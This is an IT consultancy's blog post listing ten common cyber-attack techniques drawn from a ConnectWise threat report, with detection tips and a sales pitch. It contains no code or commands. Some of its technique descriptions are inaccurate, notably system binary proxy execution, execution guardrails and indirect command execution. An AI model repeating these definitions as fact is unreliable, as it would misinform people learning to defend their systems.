10 Cyber Attack Techniques You Should Know(2023).
In our latest blog post, “10 Cyber Attack Techniques You Should Know,” we identify vulnerabilities found in the latest ConnectWise threat report and provide insight into their latest findings. Throughout 2022, ten of the most utilised attack techniques from a sample of 440,000 cyber attacks have been identified. Often, the rate of innovation and keeping pace with business competitors can override the need for cybersecurity. To contrast this, we offer a guide for decision-makers to make informed determinations on their tools and processes.
Cyber Attack #1:
Exploitation for Client Execution
If software has a vulnerability, malicious actors can leverage this knowledge to pose a significant cyber threat. Once gaining entry through these means, attackers can execute malicious code on a system. Subsequently, this may give access to secure data, enable full system control, or provide a launching pad for future attacks. More specifically, access enables the attacker to spread malware via spear phishing or drive-by downloads. This facilitates further exploitation of computers in a network and may lead to financial and reputational losses for businesses.
For further information regarding the dangers of phishing, read our recent article – Cyber Security: Plenty of Phish in the Sea
Here are a few common targets:
Browser-Based Exploitation:
With the prevalence of drive-by compromise and spear phishing, web browsers are a common cyber risk. Adversaries may exploit a specific individual by spear phishing or simply through typical web browsing. The latter may come in the form of manipulating a browser or browser plugin, typically used by the victim. For instance, an attacker could set up a dummy website that exploits a vulnerability every time the end-user visits the site. Conversely, they could insert malicious code on a legitimate site, primed to execute when visited by the victim. Both scenarios can lead to disastrous consequences.
Office Applications:
Common software vulnerabilities have been exploited to transmit malicious files either via attachments or download links. This phishing technique requires the user to open the attachment or download the link.
Common Third-Party Applications:
Common enterprise applications such as Adobe Reader or Flash have been targeted as a vehicle for cyber intrusion. Many exploits are delivered as objects within an app, e.g. a malicious pdf used to execute code on the victim’s reader software.
Detecting software exploitation varies depending on the cybersecurity solutions available, but there are signs:
- Abnormal behaviour of browsers or applications
- Suspicious files
- Evidence of attempts to hide execution
- Unusual network traffic
For further reading on cybersecurity best practices, see our article 10 ways to prevent cyber attacks.
Cyber Attack #2:
Boot or Logon Autostart Execution
A boot or logon autostart execution runs malicious code when a device is starting up, or when a user logs in. Similar to your morning routine, a computer completes a set of actions to start the day right, but an attacker can set those actions to suit their means. Usually, an attacker will use this technique to maintain control of a targeted system or extend access privileges. Operating systems may have features to enable the automatic startup of some software, attackers use these autostart programs to change the way an operating system works.
Cyber Attack #3:
System Binary Proxy Execution
Attackers clone trusted, pre-installed software, known as system binaries, to avoid security checks for unauthorised programs.
Cyber Attack #4:
Indirect Command Execution
Indirect command execution is a covert technique to extract sensitive data from an infected computer. Consider this scenario: an adversary infects a computer through a phishing email and creates a script to extract sensitive data. Then, the attacker uploads the script onto a computer and schedules it to run outside of business hours. Due to already having access, the script runs as the usual employee account and can extract financial data without triggering any alarms. As a result, the attacker maintains anonymity.
See the SonicWall Cyber Threat Report for more
Cyber Attack #5:
Process Injection
Process injection involves running malicious code within a legitimate process on a target system. Essentially, malware disguises itself by using a trusted program, which helps it avoid detection by security tools and enables it to steal resources and access sensitive data. It’s similar to a petty criminal escaping through a crowded train platform, using the chaos to blend in with the crowd.
Cyber Attack #6:
Data Destruction
As the name suggests, data destruction is a process where attackers aim to cover their tracks by erasing all evidence of their activity. This technique prevents victims from recovering sensitive information and also makes it harder for data forensic professionals to investigate the breach.
Cyber Attack #7:
Data Encryption
Data encryption is another technique that hackers use to conceal their activity. This process involves scrambling data so that only the owner of the encryption key can access it. Ironically, we use encryption to secure our sensitive data, but in this case, it’s being used for nefarious purposes.
For example, a hacker might gain access to your personal information and encrypt the files, demanding a ransom in exchange for the encryption key. Using encryption maliciously can cause a business to grind to a halt and result in significant financial damage, as well as damage to its reputation.
One real-world example of this is the 2017 Wannacry ransomware attack. The attack disrupted key healthcare infrastructure in the UK and postal service FedEx in the US, resulting in hundreds of millions of dollars in damages. The attackers encrypted data, held hospitals and postal services for ransom, and put lives at risk.
See our case study on the efforts of Microsoft Digital Crime Unit for more.
Cyber Attack #8:
Valid Accounts
One way for threat actors to gain access to a system and evade security measures is by compromising existing employee credentials. Even dormant accounts can be targeted, allowing attackers to escalate their privileges and carry out malicious activities.
Cyber Attack #9
Execution Guardrails
Execution guardrails are security measures designed to prevent malware from running on a system. Similar to air traffic controllers, they ensure the safe passage of data and processes in a digital environment. However, like data encryption, they can be used for nefarious purposes. If a hacker has already used a process injection, they may attempt to manipulate the execution guardrails to run the code when the computer is inactive. By monitoring the user’s keystrokes and waiting for a period of inactivity, the attacker can increase their chances of success.
Cyber Attack #10
Command and Scripting Interpreter
Command and scripting interpreters are programs used to modify settings and carry out actions on a computer. Attackers can exploit these programs to exfiltrate data or download malicious code onto a target system. To minimise the risk of such attacks, it’s important to limit access to relevant employees, explore detection software options, and keep software and operating systems up-to-date.
For more information on the importance of patch management, check out our article on the topic.
In Conclusion
In conclusion, the list of cyber attacks highlights various techniques that malicious actors use to compromise computer systems, steal sensitive data, or cause disruption. These attacks range from exploiting software vulnerabilities, using autostart programs, cloning system binaries, to injecting malicious code into legitimate processes. Additionally, attackers may use techniques like data destruction or encryption to cover their tracks and evade detection. To protect against these attacks, it is essential to employ robust cybersecurity measures, such as keeping software up-to-date, using strong passwords, and implementing multi-factor authentication. Regular employee training and awareness programs can also help prevent successful attacks.
If you require an experienced and knowledgeable IT consultation, our experts are waiting to hear from you. We have product and service offerings to neutralise potential threats, empower your workforce and protect your business. Fill out the form below to get in touch.
